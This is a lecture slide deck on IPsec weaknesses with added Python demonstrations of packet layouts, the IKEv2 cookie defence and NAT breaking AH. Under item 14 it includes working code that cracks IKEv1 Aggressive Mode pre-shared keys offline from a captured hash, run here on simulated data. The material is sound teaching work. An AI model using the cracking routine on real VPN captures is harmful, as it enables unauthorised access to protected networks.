IPsec - 2 Problems (Eng)

IPsec provides security at the IP layer by ensuring data integrity, authentication, and confidentiality during transmission. However, IPsec has several problems including difficult key management in large networks, resource consumption due to encryption/decryption, and incompatibility with NAT. Solutions include simplifying options, using hardware accelerators, and encapsulation protocols like NAT-T. Overall IPsec is complex and could benefit from simplification while maintaining security.


IPsec Problems and Solutions
Yasir Jan
Future Internet
29th May, 2008

1/19
Contents
- Definition
- Architecture Types
- Modes of Operation
- Key Exchange
- Multiple Options
- IPsec problems and solutions
- Summary
- References

IPsec
Definition
- IP security refers to security mechanisms implemented at the IP (Internet Protocol) layer to ensure integrity, authentication and confidentiality of data during transmission in the open Internet environment.

Fig: Security
IPsec
Architecture Types
- Authentication Header (AH)
  - Integrity + Authentication
- Encapsulating Security Payload (ESP)
  - Integrity + Authentication + Confidentiality

Fig: AH and ESP comparison
  AH:  Integrity, Authentication
  ESP: Integrity, Authentication, Confidentiality

IPsec
Modes of Operation
- Transport Mode
  - Only the payload of the IP packet is encrypted and/or authenticated; the original IP header stays in front and is still used for routing.
- Tunnel Mode
  - The entire original IP packet (header plus data) is encrypted and/or authenticated and wrapped in a new outer IP header; this is what gateway-to-gateway VPNs use.

Packet layouts (AH only authenticates; ESP can also encrypt, and its trailer and ICV follow the data):

  AH transport mode:  [IP header][AH][upper-protocol headers and data]
  AH tunnel mode:     [new IP header][AH][old IP header][upper-protocol headers and data]
  ESP transport mode: [IP header][ESP header][upper-protocol headers and data][ESP trailer, ICV]
  ESP tunnel mode:    [new IP header][ESP header][old IP header][upper-protocol headers and data][ESP trailer, ICV]

Fig: Modes of operation
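The layouts above decide what a device in the middle of the path can still read, which is the root of the traffic-analysis and firewall problems discussed later. The following parser is an added example, not code from the original slides: it builds one constructed packet for AH transport, AH tunnel and ESP tunnel mode (placeholder ICV and ciphertext, no real cryptography) and reports what an intermediate router or firewall can extract from each. The helper names and the sample addresses are assumptions made for the example.

```python
import struct

IPPROTO_IPIP, IPPROTO_TCP, IPPROTO_ESP, IPPROTO_AH = 4, 6, 50, 51

def ip4(addr):
    return bytes(map(int, addr.split(".")))

def ipv4(src, dst, proto, payload):
    """Minimal IPv4 header (20 bytes, no options, checksum left at 0) in front of payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0, ip4(src), ip4(dst))
    return hdr + payload

def ah(next_hdr, spi, seq, icv):
    """Authentication Header (RFC 4302): next header, length in 32-bit words minus 2, reserved, SPI, sequence, ICV."""
    payload_len = (12 + len(icv)) // 4 - 2
    return struct.pack("!BBHII", next_hdr, payload_len, 0, spi, seq) + icv

def esp(spi, seq, ciphertext):
    """ESP (RFC 4303): only SPI and sequence number are in the clear; the next-header byte is inside the encrypted trailer."""
    return struct.pack("!II", spi, seq) + ciphertext

def describe(pkt):
    """Return what a router, firewall or NAT between the peers can read from an IPsec packet."""
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    info = {"src": ".".join(map(str, pkt[12:16])), "dst": ".".join(map(str, pkt[16:20])), "proto": proto}
    body = pkt[ihl:]
    if proto == IPPROTO_AH:
        next_hdr, plen, _, spi, seq = struct.unpack("!BBHII", body[:12])
        info.update(ipsec="AH", spi=spi, seq=seq, mode="tunnel" if next_hdr == IPPROTO_IPIP else "transport")
        inner = body[(plen + 2) * 4:]
        if next_hdr == IPPROTO_IPIP:
            # tunnel mode: the old IP header follows AH and is authenticated but not encrypted
            info["inner_dst"] = ".".join(map(str, inner[16:20]))
            next_hdr = inner[9]
            inner = inner[(inner[0] & 0x0F) * 4:]
        if next_hdr == IPPROTO_TCP:
            # AH never encrypts, so transport-layer ports stay readable in both modes
            info["ports"] = struct.unpack("!HH", inner[:4])
    elif proto == IPPROTO_ESP:
        spi, seq = struct.unpack("!II", body[:8])
        # everything after the 8-byte ESP header is ciphertext: mode, inner addresses and ports are hidden
        info.update(ipsec="ESP", spi=spi, seq=seq, mode="unknown", ports=None)
    return info

# Constructed sample packets (ICV and ciphertext are placeholders, no real crypto is performed here)
TCP_HDR = struct.pack("!HH", 40000, 443) + b"\x00" * 16
ICV = b"\x11" * 12
AH_TRANSPORT = ipv4("10.0.0.1", "10.0.0.2", IPPROTO_AH, ah(IPPROTO_TCP, 0x1001, 1, ICV) + TCP_HDR)
INNER = ipv4("192.168.1.5", "192.168.2.9", IPPROTO_TCP, TCP_HDR)
AH_TUNNEL = ipv4("203.0.113.1", "198.51.100.1", IPPROTO_AH, ah(IPPROTO_IPIP, 0x1002, 7, ICV) + INNER)
ESP_TUNNEL = ipv4("203.0.113.1", "198.51.100.1", IPPROTO_ESP, esp(0x2001, 3, b"\xaa" * 48))

if __name__ == "__main__":
    for name, pkt in [("AH transport", AH_TRANSPORT), ("AH tunnel", AH_TUNNEL), ("ESP tunnel", ESP_TUNNEL)]:
        print(name, describe(pkt))
```

For the AH packets the parser recovers the mode, the inner destination and even the TCP ports, because AH authenticates without hiding anything; for ESP it sees only the outer addresses, the SPI and the sequence number, which is exactly why firewalls and NATs struggle with it.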


IPsec
Key Exchange
- The IPsec key exchange protocol (IKE) is a combination of several protocols:
  - ISAKMP is the generic framework: message formats, payloads and phases, without prescribing a particular key exchange.
  - OAKLEY supplies the actual Diffie-Hellman key exchange in several modes; most of IKE is done using OAKLEY.
  - SKEME contributes public-key encryption for authentication and a fast re-keying feature.
- IKEv2 also adds protection against denial-of-service attacks that use spoofed packets: a responder that suspects a flood answers with a stateless cookie and does no expensive work until the initiator echoes it.

Fig: Key exchange


IPsec
Multiple options
- Any authentication (integrity) method
  - Keyed hashes in the form of a Hashed Message Authentication Code (HMAC) built on cryptographic hash functions such as MD5 or SHA-1 (HMAC-MD5-96, HMAC-SHA-1-96)
- Any encryption scheme
  - Data Encryption Standard (DES), triple-DES, Advanced Encryption Standard (AES) and Blowfish in common use (single DES is no longer considered secure and should not be negotiated)
- Any of the protocols and modes within IKE

Fig: Many options

IPsec problems and solutions
1) Key Management in Large Networks
- When IPsec is deployed at large scale, key management becomes very difficult: keys and security associations multiply with the number of peer pairs, not with the number of hosts.

2) Difficult Traffic Analysis
- Intermediate devices cannot inspect or process flags, ports and other protocol fields because they are encrypted, so firewalls, intrusion detection and QoS classification see only the outer header and the SPI.

Fig: Big Networks


IPsec problems and solutions
3) Resource Consumption
- Encryption and decryption are computationally intensive.
- Cisco designed a VPN accelerator card to offload the computation to dedicated hardware.

4) Too Much Flexibility
- Unnecessarily many options are available for choosing algorithms and modes, which makes implementations large and interoperability testing hard.
- Solution: reduced flexibility is sometimes better, for example removing AH, since ESP with authentication covers its use cases.

Fig: Consume many resources


IPsec problems and solutions
5) Client Software
- Where the operating system's TCP/IP stack does not provide IPsec, a separate client has to be installed.
- There is a danger of the user installing malicious or unreliable client software.
- Solution: install clients only from reliable sources.

Fig: Malicious Software

6) Relayed ICMP Messages
- The inner data of ICMP messages relayed across the tunnel is revealed to an attacker, so it can be intercepted.
- Using ICMP header information, IPsec packets could in some cases be redirected, or error messages could be generated [1].
- Solution: use ESP together with AH.

IPsec problems and solutions
7) Scrambled Group Password Recovery
- IPsec group passwords were first sniffed from memory while in use, so Cisco VPN clients were redesigned to scramble (obfuscate) the password in memory, but the obfuscation was reversed as well.
- Once the group password is known, an attacker can hijack a user's connection and obtain other usernames and passwords.

8) No End-to-End Protection
- IPsec protects host-to-host or gateway-to-gateway traffic, and applications cannot tell whether it is in effect, so they use their own SSL/TLS or other techniques.
- The IETF is working on an API integrated with IPsec so that applications can make maximum use of it.

Fig: Scrambled passwords


IPsec problems and solutions
9) Firewalls
- Firewalls monitor the ports and protocols that traffic originates from and is destined for, to determine the traffic's "acceptability" before allowing it through.
- A firewall is easy to set up with the standard exceptions and whatever customisations you need.
- With IPsec you have to create rules with filter lists and actions, add them to a policy, distribute the policy, and so on.
- But IPsec has many advantages over firewalls, such as encryption and no single choke point.

Fig: IPsec vs firewalls
IPsec problems and solutions
10) VoIP Quality Loss
- Scheduling of the cryptographic work causes packet loss in real-time applications.
- Added latency and jitter in VoIP calls.

Fig: Voice quality

11) Denial of Service
- An attacker sends a flood of connection-initiation messages to the victim, which holds half-open state for each one until the connection timeout expires; with IKEv1, every spoofed initiation also makes the responder allocate state and start expensive computation.
- Solution: IKEv2 includes a denial-of-service defence (the stateless cookie exchange).
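The IKEv2 defence mentioned on the Key Exchange slide and again in item 11 is simple enough to show end to end. The simulation below is an added example and not code from the original slides or from any IKE implementation: a responder that notices too many half-open exchanges stops allocating state and answers with a COOKIE notification; an attacker sending from spoofed sources never sees that reply and so can never get past it, while an honest initiator just resends its request with the cookie attached. The cookie construction (version byte plus an HMAC over SPIi, Ni and the initiator address), the threshold and the message names are simplifications assumed for the example; RFC 7296 section 2.6 describes the real mechanism.

```python
import hmac, hashlib, os

class Responder:
    """IKE responder with the IKEv2 COOKIE mechanism (RFC 7296 section 2.6), simplified.
    Cookie = version byte | HMAC(secret, SPIi | Ni | IPi): no per-initiator state is kept until
    the initiator proves it can receive packets at its claimed address by echoing the cookie."""

    def __init__(self, under_attack_threshold=2):
        self.secret = os.urandom(16)          # real responders rotate this secret periodically
        self.half_open = {}                   # SPIi -> state: the resource a flood tries to exhaust
        self.threshold = under_attack_threshold

    def _cookie(self, spi_i, nonce_i, ip_i):
        mac = hmac.new(self.secret, spi_i + nonce_i + ip_i.encode(), hashlib.sha256).digest()
        return b"\x01" + mac[:16]

    def ike_sa_init(self, ip_i, spi_i, nonce_i, cookie=None):
        """Handle an IKE_SA_INIT request; returns (message type, payload)."""
        under_attack = len(self.half_open) >= self.threshold
        if under_attack:
            expected = self._cookie(spi_i, nonce_i, ip_i)
            if cookie is None or not hmac.compare_digest(cookie, expected):
                # cheap reply: no memory allocated, no Diffie-Hellman computed
                return ("N(COOKIE)", expected)
        self.half_open[spi_i] = (ip_i, nonce_i)        # only now do the real (expensive) work
        return ("IKE_SA_INIT_RESPONSE", os.urandom(8))  # responder SPI

def attacker_flood(responder, count):
    """Spoofed-source flood: the attacker never receives the replies, so it cannot echo any cookie."""
    accepted = 0
    for i in range(count):
        msg, _ = responder.ike_sa_init(f"10.{i % 256}.{i // 256}.1", os.urandom(8), os.urandom(16))
        accepted += msg == "IKE_SA_INIT_RESPONSE"
    return accepted

def honest_initiator(responder, ip_i):
    """Legitimate initiator: on N(COOKIE) it resends the same IKE_SA_INIT with the cookie attached."""
    spi_i, nonce_i = os.urandom(8), os.urandom(16)
    msg, payload = responder.ike_sa_init(ip_i, spi_i, nonce_i)
    if msg == "N(COOKIE)":
        msg, payload = responder.ike_sa_init(ip_i, spi_i, nonce_i, cookie=payload)
    return msg

if __name__ == "__main__":
    r = Responder(under_attack_threshold=2)
    print("flood packets that consumed state:", attacker_flood(r, 1000))
    print("honest initiator result:", honest_initiator(r, "203.0.113.9"))
```

Under a flood of a thousand spoofed requests the responder commits state for only the first two; afterwards each spoofed packet costs one HMAC and no memory, whereas the honest initiator completes with one extra round trip.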

IPsec problems and solutions
12) Multicast Traffic
- IPsec was designed around packets with a single destination address, so managing SPIs and security associations for a multicast group is difficult.
- Some streaming-multimedia applications assign port numbers dynamically, so an IPsec policy is difficult to write for them.
- IPsec has a multicast option, but it is not enough for all occasions.

13) Security of the Underlying Algorithms
- IPsec relies on other protocols and algorithms for its security. They must be strong enough to stop an attacker; otherwise a secure IPsec framework on its own is useless.

Fig: Multicast traffic
IPsec problems and solutions
14) Brute Force Attack
- The IKE phase-1 initiation in Aggressive Mode is a fixed three-message exchange, and with pre-shared-key authentication the responder's authentication hash (HASH_R) is sent unencrypted; an intruder who delays or merely observes the initiation can capture that hash and recover the key offline by brute force.
- A crack tool was used against pre-shared-key IKE authentication [2] to guess the key by brute force.

Fig: Trying out ALL options by brute force
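Why the Aggressive Mode hash is enough for an offline attack is clearest when the RFC 2409 computation is written out. The following is an added example, not code from the original slides or from the tool cited in [2]: it recomputes HASH_R exactly as the standard defines it for pre-shared-key authentication (SKEYID = prf(PSK, Ni | Nr), HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi | IDir), with prf = HMAC-SHA1 assumed), builds a constructed capture of the fields that travel in the clear in the three messages, and then tests candidate keys against the captured hash. The nonces, cookies and Diffie-Hellman public values are random placeholders, the SA and ID payloads are constructed byte strings, and the wordlist is made up for the example.

```python
import hmac, hashlib, os

def prf(key, data):
    """IKEv1 prf: HMAC with the negotiated hash function; HMAC-SHA1 assumed here."""
    return hmac.new(key, data, hashlib.sha1).digest()

def hash_r(psk, ex):
    """HASH_R as RFC 2409 defines it for pre-shared-key authentication.
    Apart from psk, every input is carried in the clear in Aggressive Mode."""
    skeyid = prf(psk, ex["Ni"] + ex["Nr"])
    return prf(skeyid, ex["gxr"] + ex["gxi"] + ex["CKY_R"] + ex["CKY_I"] + ex["SAi"] + ex["IDir"])

def aggressive_mode_capture(real_psk):
    """Simulated responder side: the fields a sniffer sees in the 3-message Aggressive Mode exchange.
    Nonces, cookies and DH public values are random placeholders (constructed data)."""
    ex = {
        "Ni": os.urandom(16), "Nr": os.urandom(16),          # initiator/responder nonces (message 1 and 2)
        "gxi": os.urandom(128), "gxr": os.urandom(128),      # DH public values (message 1 and 2)
        "CKY_I": os.urandom(8), "CKY_R": os.urandom(8),      # ISAKMP cookies from the header
        "SAi": b"\x00\x00\x00\x01" + b"\x03" * 12,           # initiator's SA proposal (constructed)
        "IDir": b"\x01\x00\x00\x00" + b"gateway",            # responder identity payload (constructed)
    }
    ex["HASH_R"] = hash_r(real_psk, ex)   # message 2 carries this without any encryption
    return ex

def crack_psk(capture, candidates):
    """Offline guessing: recompute HASH_R for each candidate PSK and compare with the captured one.
    No further packets are sent, so the responder sees nothing and cannot rate-limit the attempts."""
    public = {k: v for k, v in capture.items() if k != "HASH_R"}
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand, public), capture["HASH_R"]):
            return cand
    return None

WORDLIST = [b"password", b"cisco123", b"vpn", b"letmein", b"secret"]   # constructed wordlist

if __name__ == "__main__":
    cap = aggressive_mode_capture(b"letmein")
    print("recovered PSK:", crack_psk(cap, WORDLIST))
```

Main Mode sends the same hash inside the encrypted part of the exchange, so the attack is specific to Aggressive Mode with pre-shared keys; a long random PSK, certificate authentication or IKEv2 removes it.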


IPsec problems and solutions
15) Incompatibility with NAT (RFC 3715)
- Network Address Translation (NAT) was developed to answer the impending exhaustion of IPv4 addresses.
- When a NAT changes the IP addresses or ports in the IP header, the AH integrity check at the receiver fails, because the NAT does not know the key and so cannot recalculate the hash over the rewritten header; the receiver drops the packets. With ESP the NAT device cannot read or change the port information inside the encrypted TCP header, so it cannot multiplex several inner hosts.
- Solution: NAT-T (NAT Traversal) encapsulates the IPsec part of the packet in an additional UDP header placed between the outer IP header and the ESP portion, so the NAT has ports to rewrite and the ESP integrity check, which does not cover the outer IP header, still succeeds.

Fig: IPsec and NAT are incompatible
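The difference between AH and ESP under NAT comes down to what each integrity check covers. The code below is an added example, not from the original slides or any IPsec implementation: it computes an AH ICV the way RFC 4302 prescribes (outer IP header with its mutable fields zeroed, then the AH and payload) and an ESP ICV over the ESP header and body only, pushes both packets through a simplified NAT that rewrites the source address and, for UDP, the source port, and runs the receiver's verification. The key, addresses and payloads are constructed for the example; HMAC-SHA1-96 is assumed as the integrity algorithm and IP/UDP checksums are left at zero because they do not affect the point.

```python
import hmac, hashlib, struct

IPPROTO_UDP, IPPROTO_AH = 17, 51
NAT_T_PORT = 4500   # UDP port used by NAT-T encapsulation (RFC 3948)

def ip4(addr):
    return bytes(map(int, addr.split(".")))

def ipv4_header(src, dst, proto, payload_len, ttl=64):
    """20-byte IPv4 header, checksum left at 0 (not relevant to the demonstration)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0, ip4(src), ip4(dst))

def ah_icv(key, ip_hdr, ah_no_icv, payload):
    """AH (RFC 4302) authenticates the IP header too: mutable fields (TOS, flags/fragment offset,
    TTL, checksum) are zeroed before hashing, but source and destination addresses are covered."""
    hdr = bytearray(ip_hdr)
    hdr[1] = 0
    hdr[6:8] = b"\0\0"
    hdr[8] = 0
    hdr[10:12] = b"\0\0"
    data = bytes(hdr) + ah_no_icv + b"\0" * 12 + payload   # ICV field itself is zero while hashing
    return hmac.new(key, data, hashlib.sha1).digest()[:12]  # HMAC-SHA1-96

def build_ah(key, src, dst, payload):
    ah_no_icv = struct.pack("!BBHII", 6, 4, 0, 0x1001, 1)   # next=TCP, len=(24/4)-2, reserved, SPI, seq
    ip_hdr = ipv4_header(src, dst, IPPROTO_AH, 24 + len(payload))
    return ip_hdr + ah_no_icv + ah_icv(key, ip_hdr, ah_no_icv, payload) + payload

def verify_ah(key, pkt):
    ip_hdr, ah_no_icv, icv, payload = pkt[:20], pkt[20:32], pkt[32:44], pkt[44:]
    return hmac.compare_digest(icv, ah_icv(key, ip_hdr, ah_no_icv, payload))

def esp_icv(key, esp_body):
    """ESP (RFC 4303) ICV covers the ESP header, ciphertext and trailer only, never the outer IP header."""
    return hmac.new(key, esp_body, hashlib.sha1).digest()[:12]

def build_esp_natt(key, src, dst, ciphertext, sport=NAT_T_PORT):
    esp_pkt = struct.pack("!II", 0x2001, 1) + ciphertext   # SPI, seq, then (placeholder) ciphertext
    esp_pkt += esp_icv(key, esp_pkt)
    udp = struct.pack("!HHHH", sport, NAT_T_PORT, 8 + len(esp_pkt), 0)   # NAT-T: ESP inside UDP/4500
    return ipv4_header(src, dst, IPPROTO_UDP, 8 + len(esp_pkt)) + udp + esp_pkt

def verify_esp_natt(key, pkt):
    esp_pkt = pkt[28:]                       # skip 20-byte IP + 8-byte UDP
    return hmac.compare_digest(esp_pkt[-12:], esp_icv(key, esp_pkt[:-12]))

def nat(pkt, new_src, new_sport=None):
    """What a NAT does on the way out: rewrite the source address (and UDP source port) and decrement
    the TTL. It cannot repair an AH ICV because it does not hold the IPsec key."""
    out = bytearray(pkt)
    out[12:16] = ip4(new_src)
    out[8] -= 1
    if new_sport is not None and out[9] == IPPROTO_UDP:
        out[20:22] = struct.pack("!H", new_sport)
    return bytes(out)

KEY = b"constructed-demo-key"   # constructed; shared by both IPsec peers, unknown to the NAT
AH_PKT = build_ah(KEY, "192.168.1.10", "203.0.113.5", b"constructed TCP segment")
ESP_PKT = build_esp_natt(KEY, "192.168.1.10", "203.0.113.5", b"\xaa" * 32)

def demo():
    """Receiver-side integrity checks before and after the packets pass through the NAT."""
    return {
        "ah_direct": verify_ah(KEY, AH_PKT),
        "ah_after_nat": verify_ah(KEY, nat(AH_PKT, "198.51.100.7")),
        "esp_natt_after_nat": verify_esp_natt(KEY, nat(ESP_PKT, "198.51.100.7", new_sport=61234)),
    }

if __name__ == "__main__":
    print(demo())
```

The TTL decrement alone does not break AH, since TTL is one of the zeroed mutable fields; the rewritten source address does. Plain ESP would also survive the address rewrite, but without the UDP header the NAT has no port to map several inner hosts onto one public address, which is why NAT-T adds UDP/4500 rather than relying on ESP's narrower ICV alone.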
Summary
- IPsec has multiple components.
- Security and authentication are provided by additional components (IKE, hash and cipher algorithms), so those must be secure as well.
- IPsec has some incompatibility issues (NAT, multicast, firewalls).
- IPsec is overall complex and needs simplification.

Fig: Summary


References
[1] http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1086803,00.html
[2] http://ikecrack.sourceforge.net/
[3] http://www.securitydocs.com/pdf/2926.PDF
[4] http://www.cisco.com
[5] http://www.springerlink.com/content/t84w482122jt81x3/fulltext.pdf
[6] http://blogs.msdn.com/james_morey/default.aspx
Images taken from various sources on the Internet.

Fig: References


Thank you

Fig: Questions